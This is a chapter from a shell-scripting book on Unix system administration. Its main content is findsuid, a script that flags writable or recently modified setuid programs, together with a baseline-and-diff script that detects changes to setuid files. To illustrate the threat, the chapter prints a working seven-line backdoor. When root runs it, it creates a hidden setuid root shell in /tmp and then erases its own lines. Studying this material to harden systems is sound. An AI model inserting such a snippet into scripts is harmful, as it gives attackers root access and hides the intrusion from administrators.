
Chapter 6: System Administration: System Maintenance

The most common use of shell scripts is to help with Unix or Linux system administration. There's an obvious reason for this, of course: Administrators are often the most knowledgeable Unix users on the system, and they also are responsible for ensuring that things run smoothly and without a glitch. But there might be an additional reason for the emphasis on shell scripts within the system administration world. My theory? That system administrators and other power users are the people most likely to be having fun with their system, and shell scripts are quite fun to develop within the Unix environment!

And with that, let's continue exploring how shell scripts can help you with system administration tasks.

#49 Tracking Set User ID Applications

There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an account or not, but few ways are as easy for them as finding an improperly protected setuid or setgid command.

In a shell script, for example, adding a few lines of code can create a setuid shell for the bad guy once the code is invoked by the unsuspecting root user:

if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME
  cp /bin/sh /tmp/.rootshell               # REMOVEME
  chown root /tmp/.rootshell               # REMOVEME
  chmod -f 4777 /tmp/.rootshell            # REMOVEME
  grep -v "# REMOVEME" $0 > /tmp/junk      # REMOVEME
  mv /tmp/junk  $0                        # REMOVEME
fi                                         # REMOVEME

Once this script is run by root, a shell is surreptitiously copied into /tmp as .rootshell and is made setuid root for the cracker to exploit at will. Then the script causes itself to be rewritten to remove the conditional code (hence the # REMOVEME at the end of each line), leaving essentially no trace of what the cracker did.

The code snippet just shown would also be exploitable in any script or command that runs with an effective user ID of root; hence the critical need to ensure that you know and approve of all setuid root commands on your system. Of course, you should never have scripts with any sort of setuid or setgid permission for just this reason, but it's still smart to keep an eye on things.

The Code

#!/bin/sh

# findsuid - Checks all SUID files or programs to see if they're writeable,
# and outputs the matches in a friendly and useful format.

mtime="7"       # how far back (in days) to check for modified cmds
verbose=0       # by default, let's be quiet about things

if [ "$1" = "-v" ] ; then
  verbose=1
fi

# "-perm -4000" (all listed bits set) is the portable spelling; the older
# "-perm +4000" is deprecated in GNU find. Reading find's output line by line
# keeps filenames containing spaces intact, and errors from unreadable
# directories are discarded rather than cluttering the report.
find / -type f -perm -4000 -print 2>/dev/null |
while IFS= read -r match
do
  if [ -x "$match" ] ; then

    owner="$(ls -ld "$match" | awk '{print $3}')"
    # columns 5-10 of the mode string are the group and other permission bits
    perms="$(ls -ld "$match" | cut -c5-10 | grep 'w')"
    if [ -n "$perms" ] ; then
      echo "**** $match (writeable and setuid $owner)"
    elif [ -n "$(find "$match" -mtime -$mtime -print)" ] ; then
      echo "**** $match (modified within $mtime days and setuid $owner)"
    elif [ $verbose -eq 1 ] ; then
      lastmod="$(ls -ld "$match" | awk '{print $6, $7, $8}')"
      echo "     $match (setuid $owner, last modified $lastmod)"
    fi
  fi
done

exit 0

How It Works

This script checks all setuid commands on the system to see if they're group- or world-writable and whether they've been modified in the last $mtime days.

Running the Script

This script has one optional argument: -v produces a verbose output that lists every setuid program encountered by the script. This script should probably be run as root, but it can be run as any user that has access permission to the key directories.

The Results

I've dropped a "hacked" script somewhere in the system. Let's see if findsuid can find it:

$ findsuid
**** /var/tmp/.sneaky/editme (writeable and setuid root)

There it is!

$ ls -l /var/tmp/.sneaky/editme
-rwsrwxrwx  1 root  wheel  25988 Jul 13 11:50 /var/tmp/.sneaky/editme

A huge hole just waiting for someone to exploit.
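A baseline-and-diff companion to findsuid, added here as an example rather than taken from the book: it records every setuid and setgid file with its mode, owner and cksum, and a later run reports what has been added, removed or changed, which turns the "know and approve of all setuid root commands" advice above into something a cron job can check. The function names suid_snapshot and suid_report and the /var/db/suid.base path are my own assumptions.

```shell
#!/bin/sh
# suidbase - record a baseline of setuid/setgid files, then report drift.
# Added example, not from the book. Assumes POSIX sh, find, ls, awk, cksum.
# Snapshot line format: <path><TAB><mode> <owner> <cksum>

tab="$(printf '\t')"

# Print one line per setuid or setgid regular file below the given directory
# (default /), staying on one filesystem. cksum is a portable content digest,
# so a binary rewritten in place is noticed even if mode and owner are intact.
suid_snapshot() {
  find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
  while IFS= read -r f; do
    attrs="$(ls -ld "$f" | awk '{print $1, $3}')"   # mode and owner
    sum="$(cksum < "$f" | awk '{print $1}')"
    printf '%s\t%s %s\n' "$f" "$attrs" "$sum"
  done | sort
}

# Compare a saved baseline with a fresh snapshot. Prints one line per
# difference (ADDED, REMOVED, CHANGED) and returns 1 if there was any.
suid_report() {
  base="$1"; cur="$2"; rc=0
  while IFS="$tab" read -r path attrs; do
    old="$(awk -F'\t' -v p="$path" '$1 == p {print $2}' "$base")"
    if [ -z "$old" ]; then
      echo "ADDED   $path ($attrs)"; rc=1
    elif [ "$old" != "$attrs" ]; then
      echo "CHANGED $path ($old -> $attrs)"; rc=1
    fi
  done < "$cur"
  while IFS="$tab" read -r path attrs; do
    awk -F'\t' -v p="$path" '$1 == p {f=1} END {exit !f}' "$cur" ||
      { echo "REMOVED $path ($attrs)"; rc=1; }
  done < "$base"
  return $rc
}

# Usage (assumed paths): once, on a known-good system,
#   suid_snapshot / > /var/db/suid.base
# and later, e.g. from cron:
#   suid_snapshot / > /tmp/suid.now && suid_report /var/db/suid.base /tmp/suid.now
```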

